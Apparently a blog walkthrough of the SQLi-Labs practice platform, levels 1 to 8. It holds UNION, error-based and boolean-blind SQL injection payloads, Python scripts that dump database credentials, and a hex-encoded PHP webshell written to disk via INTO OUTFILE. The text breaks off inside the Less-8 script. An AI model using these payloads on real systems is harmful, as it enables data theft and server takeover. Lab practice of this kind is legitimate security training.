SqliLab 题解

Tr0y 12月 11, 2017 23:04:22 本文共 16.6k 字

SqliLab 每日一注

介绍

SQLI-LABS 是一个 SQL 注入练习平台, 包含了基础的 sql 注入案例,挺好玩的(注意:它是故意留有漏洞的靶场,只应部署在本机或隔离环境中,不要暴露到公网)
项目地址在这

安装

将源代码复制到 Apache webroot 文件夹(htdocs,/var/www)
打开 sql-connections 文件夹下的”db-creds.inc”文件
修改 mysql 用户名和密码为你自己的
打开浏览器,通过 localhost 的 index.html 访问文件夹
点击 setup/resetDB 就会在你的 mysql 中创造数据库
开始日站咯

Day1-Less1

分析

select *,* from XX where id = '$id' LIMIT 0,1
select *,* from XX where id = '' or 1=1 limit 1,2--+' LIMIT 0,1
http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 3,4 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+


数据库版本: @@version
查看 MySQL 的当前用户 USER()
INFORMATION_SCHEMA.COLUMNS
INFORMATION_SCHEMA.TABLES


select *,* from XX where id = '

' LIMIT 0,1

http://localhost/sqllab/Less-1/?id=' or 1=(SELECT length(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 0,1) --+

记录一下技巧
select group_concat(username) from users;
(sleep(ascii(mid(user()from(2)for(1)))=109))

比如在 mysql 中我们可以使用如下的经典语句进行报错。
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

这是网上流传很广的一个版本,可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union select !1)x group by concat(version(),floor(rand(0)*2));

如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
其实这是 mysql 的一个 bug 所引起的(group by 时 rand() 被重复求值,产生重复的分组 key 而报错,所以被分组的表至少要有 3 行),其他数据库都不会因为这个问题而报错。

代码

from requests import get

def GuessDBLength():
    """Boolean-blind probe for the length of the current database name.

    Sends ``length(database())=N`` for N = 0, 1, 2, ... against Less-1 and
    stops at the first N whose page contains the "Your Login name" marker
    (the oracle for a true condition). Returns that N.
    """
    print '[+]Guessing DBLength'
    probe = "http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+"
    guess = 0
    while True:
        page = get(probe % guess).text
        if 'Your Login name' in page:
            print '  [-]The DatabaseNameLength is', guess
            return guess
        guess += 1

def GuessDBName(length):
    """Recover the database name one character at a time.

    For each position 1..length, tries ASCII codes 0..126 and keeps the first
    one for which the truth-oracle marker appears. A position with no match
    (e.g. a non-ASCII byte) is silently skipped. Returns the recovered name.
    """
    print '[+]Guessing DBName'
    probe = "http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+"
    recovered = ''
    for pos in xrange(1, length + 1):
        for code in xrange(127):
            if 'Your Login name' in get(probe % (pos, code)).text:
                recovered += chr(code)
                print '  [-]', recovered
                break
    print '  [-]DBName is:', recovered
    return recovered

def GuessTBsNum(name):
    """Count the tables in schema `name` via information_schema.

    Probes ``N=(SELECT count(TABLE_NAME) ...)`` for N = 0, 1, 2, ... and
    returns the first N that makes the truth marker appear.
    """
    print '[+]Guessing Tables num'
    probe = "http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, name)).text:
        count += 1
    print '  [-]The Tables num is', count
    return count

def GuessTBNameLenth(n, name):
    """Length of the n-th (0-based) table name in schema `name`.

    Probes ``ascii(SUBSTR(<name>, i, 1))`` for i = 1, 2, ...; past the end
    SUBSTR yields '' and ascii('') is 0 (falsy), so the first position whose
    probe fails is one past the last character. Returns that length.
    """
    print '[+]Guessing TableName Length'
    probe = "http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (name, n, pos)).text:
        pos += 1
    print '  [-]The TableName Lenth is', pos - 1
    return pos - 1

def GuessTBsNames(num, DBName):
    """Recover the names of the first `num` tables in schema DBName.

    For each table, GuessTBNameLenth gives the length and every position is
    brute-forced over ASCII 0..126 until the truth marker appears. Returns
    the list of recovered names in information_schema order.
    """
    probe = "http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+"
    recovered = []
    for index in range(num):
        width = GuessTBNameLenth(index, DBName)
        print '  [-]Guessing Table Name'
        current = ''
        for pos in xrange(1, width + 1):
            for code in xrange(127):
                if 'Your Login name' in get(probe % (DBName, index, pos, code)).text:
                    current += chr(code)
                    print '    [-]', current
                    break
        recovered.append(current)
    print '  [-]All Tables Names is:', recovered
    return recovered

def GuessCLMNum(tname, dname):
    """Count the columns of dname.tname via information_schema.

    Same counting pattern as GuessTBsNum: N = 0, 1, 2, ... until the truth
    marker appears. Returns N.
    """
    print '[+]Guessing Colunms num'
    probe = "http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, tname, dname)).text:
        count += 1
    print '  [-]The Colunm num is', count
    return count

def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th (0-based) column name of dname.tname.

    Walks positions 1, 2, ... while ascii(SUBSTR(...)) is truthy; the first
    falsy position is one past the end. Returns the length.
    """
    probe = "http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (tname, dname, cnum, pos)).text:
        pos += 1
    print '  [-]The Colunm Lenth is', pos - 1
    return pos - 1

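def GuessCLMName(DBName, TNames):
    """Enumerate the columns of every table in TNames, dumping each column's
    rows as soon as its name is recovered.

    Fix: the original discarded the value returned by GuessDatas and returned
    None, so the dump only existed on stdout. Prints and request order are
    unchanged; the function now returns {table: [(column, rows), ...]}.
    Recovered names are interpolated back into later queries unescaped —
    acceptable in this lab, never against data you do not control.
    """
    probe = "http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+"
    result = {}
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        dumps = []
        for cnum in range(GuessCLMNum(tname, DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for pos in xrange(1, length + 1):
                for code in xrange(127):
                    if 'Your Login name' in get(probe % (tname, DBName, cnum, pos, code)).text:
                        name += chr(code)
                        print '    [-]', name
                        break
            # dump the column right away, as the original did
            dumps.append((name, GuessDatas(DBName, tname, name)))
            CLMNames.append(name)
        print '  [-]The Colunms are', CLMNames
        result[tname] = dumps
    return result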


def GuessDatasnum(dname, tname, cname):
    """Number of rows in dname.tname, counted over column cname.

    Probes ``N=(SELECT count(cname) FROM dname.tname)`` for N = 0, 1, ...
    until the truth marker appears. Returns N (NULL values are not counted).
    """
    probe = "http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, cname, dname, tname)).text:
        count += 1
    print '  [-]The Datas num is', count
    return count

def GuessDataLen(dname, tname, cname, n):
    """Length of the value in row n (0-based, LIMIT order) of dname.tname.cname.

    Walks positions while ascii(SUBSTR(...)) is truthy; returns the index of
    the last truthy position.
    """
    print '    [-]Guessing data length'
    probe = "http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (cname, dname, tname, n, pos)).text:
        pos += 1
    print '  [-]The Data Lenth is', pos - 1
    return pos - 1

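def GuessDatas(dname, tname, cname):
    """Dump every row of column cname in dname.tname by boolean-blind probing.

    Fix: the retry loop used a bare ``except:`` (which also swallowed
    KeyboardInterrupt, so Ctrl-C could not stop a failing run) and re-sent
    the request immediately in a tight loop. It now catches Exception only
    and pauses one second between attempts. Output and return value are
    unchanged: a list with one string per row.
    """
    import time  # local import keeps the listing's top-of-file imports as-is
    datanum = GuessDatasnum(dname, tname, cname)
    probe = "http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+"
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for pos in xrange(1, length + 1):
            for code in xrange(127):
                while True:
                    try:
                        r = get(probe % (cname, dname, tname, no, pos, code))
                        break
                    except Exception:
                        print 'Relaxing...'
                        time.sleep(1)
                if 'Your Login name' in r.text:
                    name += chr(code)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data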


# Driver: schema -> tables -> columns (each column is dumped inside GuessCLMName).
DBLength = GuessDBLength()  # length of database()
DBName = GuessDBName(DBLength)  # its characters
print
TBsNum = GuessTBsNum(DBName)  # number of tables in that schema
TBsNames = GuessTBsNames(TBsNum, DBName)  # their names
print
GuessCLMName(DBName, TBsNames)  # columns of every table, plus their data
print '[!]All Done!'

Day2-Less2

分析

select *,* from XX where id = $id LIMIT 0,1

select *,* from XX where id = 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+ LIMIT 0,1
http://localhost/sqllab/Less-2/?id= 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+


代码

from requests import get

def GuessDBLength():
    """Boolean-blind length probe for database() on Less-2 (numeric id, no
    quote to close). Returns the first N for which the truth marker appears."""
    print '[+]Guessing DBLength'
    probe = "http://localhost/sqllab/Less-2/?id=0 or length(database())=%d--+"
    guess = 0
    while True:
        page = get(probe % guess).text
        if 'Your Login name' in page:
            print '  [-]The DatabaseNameLength is', guess
            return guess
        guess += 1

def GuessDBName(length):
    """Recover database() character by character on Less-2.

    Positions 1..length, ASCII codes 0..126; a position with no match is
    skipped silently. Returns the recovered name.
    """
    print '[+]Guessing DBName'
    probe = "http://localhost/sqllab/Less-2/?id=0 or ascii(SUBSTR(database(),%d,1))='%d'--+"
    recovered = ''
    for pos in xrange(1, length + 1):
        for code in xrange(127):
            if 'Your Login name' in get(probe % (pos, code)).text:
                recovered += chr(code)
                print '  [-]', recovered
                break
    print '  [-]DBName is:', recovered
    return recovered

def GuessTBsNum(name):
    """Count tables in schema `name` (Less-2): N = 0, 1, ... until the
    truth marker appears. Returns N."""
    print '[+]Guessing Tables num'
    probe = "http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, name)).text:
        count += 1
    print '  [-]The Tables num is', count
    return count

def GuessTBNameLenth(n, name):
    """Length of the n-th table name in schema `name` (Less-2).

    ascii(SUBSTR(..., i, 1)) is truthy for every real position and 0 past
    the end, so the first failing position minus one is the length.
    """
    print '[+]Guessing TableName Length'
    probe = "http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (name, n, pos)).text:
        pos += 1
    print '  [-]The TableName Lenth is', pos - 1
    return pos - 1

def GuessTBsNames(num, DBName):
    """Recover the first `num` table names of schema DBName (Less-2).

    Length from GuessTBNameLenth, then each position brute-forced over
    ASCII 0..126. Returns the list of names.
    """
    probe = "http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+"
    recovered = []
    for index in range(num):
        width = GuessTBNameLenth(index, DBName)
        print '  [-]Guessing Table Name'
        current = ''
        for pos in xrange(1, width + 1):
            for code in xrange(127):
                if 'Your Login name' in get(probe % (DBName, index, pos, code)).text:
                    current += chr(code)
                    print '    [-]', current
                    break
        recovered.append(current)
    print '  [-]All Tables Names is:', recovered
    return recovered

def GuessCLMNum(tname, dname):
    """Count the columns of dname.tname (Less-2). Returns the first N for
    which ``N=(SELECT count(COLUMN_NAME) ...)`` is true."""
    print '[+]Guessing Colunms num'
    probe = "http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, tname, dname)).text:
        count += 1
    print '  [-]The Colunm num is', count
    return count

def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name of dname.tname (Less-2); first
    falsy ascii(SUBSTR(...)) position minus one."""
    probe = "http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (tname, dname, cnum, pos)).text:
        pos += 1
    print '  [-]The Colunm Lenth is', pos - 1
    return pos - 1

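def GuessCLMName(DBName, TNames):
    """Enumerate the columns of each table in TNames (Less-2) and dump each
    column as soon as its name is known.

    Fix: the original dropped GuessDatas' return value and returned None.
    Prints and request order are unchanged; the function now returns
    {table: [(column, rows), ...]}.
    """
    probe = "http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+"
    result = {}
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        dumps = []
        for cnum in range(GuessCLMNum(tname, DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for pos in xrange(1, length + 1):
                for code in xrange(127):
                    if 'Your Login name' in get(probe % (tname, DBName, cnum, pos, code)).text:
                        name += chr(code)
                        print '    [-]', name
                        break
            dumps.append((name, GuessDatas(DBName, tname, name)))
            CLMNames.append(name)
        print '  [-]The Colunms are', CLMNames
        result[tname] = dumps
    return result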


def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname over column cname (Less-2); NULLs are not
    counted by count(col). Returns the first N that is true."""
    probe = "http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(%s) FROM %s.%s) --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, cname, dname, tname)).text:
        count += 1
    print '  [-]The Datas num is', count
    return count

def GuessDataLen(dname, tname, cname, n):
    """Length of row n's value in dname.tname.cname (Less-2)."""
    print '    [-]Guessing data length'
    probe = "http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (cname, dname, tname, n, pos)).text:
        pos += 1
    print '  [-]The Data Lenth is', pos - 1
    return pos - 1

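def GuessDatas(dname, tname, cname):
    """Dump every row of dname.tname.cname by boolean-blind probing (Less-2).

    Fix: the retry loop used a bare ``except:`` (also catching
    KeyboardInterrupt) and retried with no pause. It now catches Exception
    only and sleeps one second between attempts. Returns a list of strings.
    """
    import time  # local import keeps the listing's top-of-file imports as-is
    datanum = GuessDatasnum(dname, tname, cname)
    probe = "http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+"
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for pos in xrange(1, length + 1):
            for code in xrange(127):
                while True:
                    try:
                        r = get(probe % (cname, dname, tname, no, pos, code))
                        break
                    except Exception:
                        print 'Relaxing...'
                        time.sleep(1)
                if 'Your Login name' in r.text:
                    name += chr(code)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data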


# Driver for Less-2: schema -> tables -> columns (data dumped inside GuessCLMName).
DBLength = GuessDBLength()  # length of database()
DBName = GuessDBName(DBLength)  # its characters
print
TBsNum = GuessTBsNum(DBName)  # number of tables in that schema
TBsNames = GuessTBsNames(TBsNum, DBName)  # their names
print
GuessCLMName(DBName, TBsNames)  # columns of every table, plus their data
print '[!]All Done!'

Day3-Less3

分析

select *,* from XX where id = '($id)' LIMIT 0,1
select *,* from XX where id = ('$id') LIMIT 0,1

select *,* from XX where id = '(1)' LIMIT 0,1
select *,* from XX where id = '()' --+)' LIMIT 0,1
select *,* from XX where id = ('1') --+') LIMIT 0,1

select *,* from XX where id = ('
1') or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

代码

from requests import get

def GuessDBLength():
    """Boolean-blind length probe for database() on Less-3, where the id is
    wrapped as ('...') so the payload closes with ``')``. Returns the first
    N for which the truth marker appears."""
    print '[+]Guessing DBLength'
    probe = "http://localhost/sqllab/Less-3/?id=0') or length(database())=%d--+"
    guess = 0
    while True:
        page = get(probe % guess).text
        if 'Your Login name' in page:
            print '  [-]The DatabaseNameLength is', guess
            return guess
        guess += 1

def GuessDBName(length):
    """Recover database() character by character on Less-3.

    Positions 1..length, ASCII codes 0..126; an unmatched position is
    skipped silently. Returns the recovered name.
    """
    print '[+]Guessing DBName'
    probe = "http://localhost/sqllab/Less-3/?id=0') or ascii(SUBSTR(database(),%d,1))='%d'--+"
    recovered = ''
    for pos in xrange(1, length + 1):
        for code in xrange(127):
            if 'Your Login name' in get(probe % (pos, code)).text:
                recovered += chr(code)
                print '  [-]', recovered
                break
    print '  [-]DBName is:', recovered
    return recovered

def GuessTBsNum(name):
    """Count tables in schema `name` (Less-3): N = 0, 1, ... until the
    truth marker appears. Returns N."""
    print '[+]Guessing Tables num'
    probe = "http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, name)).text:
        count += 1
    print '  [-]The Tables num is', count
    return count

def GuessTBNameLenth(n, name):
    """Length of the n-th table name in schema `name` (Less-3); the first
    position where ascii(SUBSTR(...)) is falsy, minus one."""
    print '[+]Guessing TableName Length'
    probe = "http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (name, n, pos)).text:
        pos += 1
    print '  [-]The TableName Lenth is', pos - 1
    return pos - 1

def GuessTBsNames(num, DBName):
    """Recover the first `num` table names of schema DBName (Less-3).

    Length from GuessTBNameLenth, then each position brute-forced over
    ASCII 0..126. Returns the list of names.
    """
    probe = "http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+"
    recovered = []
    for index in range(num):
        width = GuessTBNameLenth(index, DBName)
        print '  [-]Guessing Table Name'
        current = ''
        for pos in xrange(1, width + 1):
            for code in xrange(127):
                if 'Your Login name' in get(probe % (DBName, index, pos, code)).text:
                    current += chr(code)
                    print '    [-]', current
                    break
        recovered.append(current)
    print '  [-]All Tables Names is:', recovered
    return recovered

def GuessCLMNum(tname, dname):
    """Count the columns of dname.tname (Less-3). Returns the first N for
    which ``N=(SELECT count(COLUMN_NAME) ...)`` is true."""
    print '[+]Guessing Colunms num'
    probe = "http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, tname, dname)).text:
        count += 1
    print '  [-]The Colunm num is', count
    return count

def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name of dname.tname (Less-3); first
    falsy ascii(SUBSTR(...)) position minus one."""
    probe = "http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (tname, dname, cnum, pos)).text:
        pos += 1
    print '  [-]The Colunm Lenth is', pos - 1
    return pos - 1

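def GuessCLMName(DBName, TNames):
    """Enumerate the columns of each table in TNames (Less-3) and dump each
    column as soon as its name is known.

    Fix: the original dropped GuessDatas' return value and returned None.
    Prints and request order are unchanged; the function now returns
    {table: [(column, rows), ...]}.
    """
    probe = "http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+"
    result = {}
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        dumps = []
        for cnum in range(GuessCLMNum(tname, DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for pos in xrange(1, length + 1):
                for code in xrange(127):
                    if 'Your Login name' in get(probe % (tname, DBName, cnum, pos, code)).text:
                        name += chr(code)
                        print '    [-]', name
                        break
            dumps.append((name, GuessDatas(DBName, tname, name)))
            CLMNames.append(name)
        print '  [-]The Colunms are', CLMNames
        result[tname] = dumps
    return result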


def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname over column cname (Less-3); NULLs are not
    counted by count(col). Returns the first N that is true."""
    probe = "http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, cname, dname, tname)).text:
        count += 1
    print '  [-]The Datas num is', count
    return count

def GuessDataLen(dname, tname, cname, n):
    """Length of row n's value in dname.tname.cname (Less-3)."""
    print '    [-]Guessing data length'
    probe = "http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (cname, dname, tname, n, pos)).text:
        pos += 1
    print '  [-]The Data Lenth is', pos - 1
    return pos - 1

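def GuessDatas(dname, tname, cname):
    """Dump every row of dname.tname.cname by boolean-blind probing (Less-3).

    Fix: the retry loop used a bare ``except:`` (also catching
    KeyboardInterrupt) and retried with no pause. It now catches Exception
    only and sleeps one second between attempts. Returns a list of strings.
    """
    import time  # local import keeps the listing's top-of-file imports as-is
    datanum = GuessDatasnum(dname, tname, cname)
    probe = "http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+"
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for pos in xrange(1, length + 1):
            for code in xrange(127):
                while True:
                    try:
                        r = get(probe % (cname, dname, tname, no, pos, code))
                        break
                    except Exception:
                        print 'Relaxing...'
                        time.sleep(1)
                if 'Your Login name' in r.text:
                    name += chr(code)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data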

# Driver for Less-3: schema -> tables -> columns (data dumped inside GuessCLMName).
DBLength = GuessDBLength()  # length of database()
DBName = GuessDBName(DBLength)  # its characters
print
TBsNum = GuessTBsNum(DBName)  # number of tables in that schema
TBsNames = GuessTBsNames(TBsNum, DBName)  # their names
print
GuessCLMName(DBName, TBsNames)  # columns of every table, plus their data
print '[!]All Done!'

Day4-Less4

分析

select *,* from XX where id = "($id)" LIMIT 0,1
select *,* from XX where id = ("$id") LIMIT 0,1

select *,* from XX where id = ("") LIMIT 0,1

select *,* from XX where id = ("
1") or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
") LIMIT 0,1

Day5-Less5

分析

select *,* from XX where id = '$id' LIMIT 0,1

select *,* from XX where id = '1' order by 3--+' LIMIT 0,1
3 列

' or 0 union all SELECT 0,1,2 FROM k--+
库名 security

concat(user(),floor(rand(0)*2))

select *,* from XX where id='
' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_NAME limit 102,1))) --+
' LIMIT 0,1

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA limit 1,1)))

 where extractvalue(1,concat('*',(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='security' limit 2,1),'*'));

 http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))) --+
 遍历 limit 的偏移量(0,1,2…)即可逐行取出
(extractvalue 的报错信息有长度限制,最多显示 32 个字符,超出部分会被截断,长字段需要用 substr 分段读取)

或者
http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) --+
(updatexml 的报错信息同样有长度限制,最多显示 32 个字符,超出部分会被截断)

或者
http://localhost/sqllab/Less-5/?id=' union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

或者
http://localhost/sqllab/Less-5/?id=' or 1 group by concat_ws('*',(select username from security.users limit 0,1),(select password from security.users limit 0,1),floor(rand(0)*2)) having min(0) --+

或者
http://localhost/sqllab/Less-5/?id=' union select (concat_ws('*', (select username from security.users limit 0,1),(select password from security.users limit 0,1), floor(rand(0)*2))), count(*), 3 from security.users group by 1 --+

Day6-Less6

分析

select *,* from XX where id = "$id" LIMIT 0,1

同 5
http://localhost/sqllab/Less-6/?id=" union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

Day7-Less7

分析

select *,* from XX where id = (('$id')) LIMIT 0,1

http://localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt" --+

select id,username,password from users where id = (('
')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt"; --+
')) LIMIT 0,1

localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "1.txt"; --+

')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "/weshell.php" --+
')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "D:\\wamp\\www\\weshell.php" --+

由于 INTO OUTFILE 的 SELECT 不向客户端返回结果集,php 取不到数据,在源码的逻辑下页面会报错;但此时文件其实已经写到了服务器上(前提是 mysql 账号有 FILE 权限、secure_file_priv 允许写到该目录,并且目标文件原本不存在——INTO OUTFILE 不会覆盖已有文件)

Day8-Less8

分析

同 5

代码

from requests import get

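def GuessDBLength():
    """Boolean-blind length probe for database() on Less-8.

    Fix: this listing is the Less-8 solution but was copied from Less-1
    with the URL left unchanged, so it attacked Less-1. The endpoint is now
    Less-8; the payload (single-quote context, "Your Login name" as the
    truth oracle) is the same. Returns the first N that is true.
    """
    print '[+]Guessing DBLength'
    probe = "http://localhost/sqllab/Less-8/?id=0' or length(database())=%d--+"
    guess = 0
    while True:
        if 'Your Login name' in get(probe % guess).text:
            print '  [-]The DatabaseNameLength is', guess
            return guess
        guess += 1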

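def GuessDBName(length):
    """Recover database() character by character on Less-8.

    Fix: the URL pointed at Less-1 (copy-paste leftover); it now targets
    Less-8. Positions 1..length, ASCII 0..126; an unmatched position is
    skipped silently. Returns the recovered name.
    """
    print '[+]Guessing DBName'
    probe = "http://localhost/sqllab/Less-8/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+"
    recovered = ''
    for pos in xrange(1, length + 1):
        for code in xrange(127):
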